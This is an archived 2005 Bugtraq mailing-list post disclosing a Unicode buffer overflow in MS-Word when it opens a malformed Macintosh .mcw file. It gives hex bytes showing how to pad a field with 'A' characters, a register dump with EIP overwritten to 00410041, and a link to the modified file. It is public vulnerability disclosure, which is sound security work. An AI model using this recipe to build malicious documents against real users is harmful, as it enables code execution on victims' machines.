lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 19 May 2005 23:33:34 -0000
From: Bahaa Naamneh <b_naamneh@...mail.com>
To: bugtraq@...urityfocus.com
Subject: UNICODE BUFFER OVERFLOW IN MS-WORD




UNICODE BUFFER OVERFLOW IN MS-WORD
===================================


*.mcw is the ms-word format file for Macintosh.

the unicode buffer overflow occurs when the user opens the malformed *.mcw document.

Proof of concept:
-----------------

by modifying the *.mcw file by using binary editor as follows

these lines were taken from .mcw file:

------snip---mcw-file----
c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42 
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00 
11 04 74 65 73 74 00 06 20 42 61 68 61 61 00 00 
00 09 00 00 00 00 0f 54 69 6d 65 73 20 4e 65 77
------snip---------------

change them as follows:

c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42 
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00 
11 04 74 65 73 74 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 00 06 20 42 61 68 
61 61 00 00 00 09 00 00 00 00 0f 54 69 6d 65 73 
------------



EAX = 00000000 EBX = 00000000 ECX = 00000006 
EDX = 7C90EB94 ESI = 00000001 EDI = 001262B0 
EIP = 00410041 ESP = 00126110 EBP = 00410041 
EFL = 00000246 


------------


* modified .mcw file can be downloaded from:
http://study.haifa.ac.il/~bnaamnih/word/foo.mcw



---------------------
Bahaa Naamnmeh
b_naamneh@...mail.com
www.bsecurity.tk


Powered by blists - more mailing lists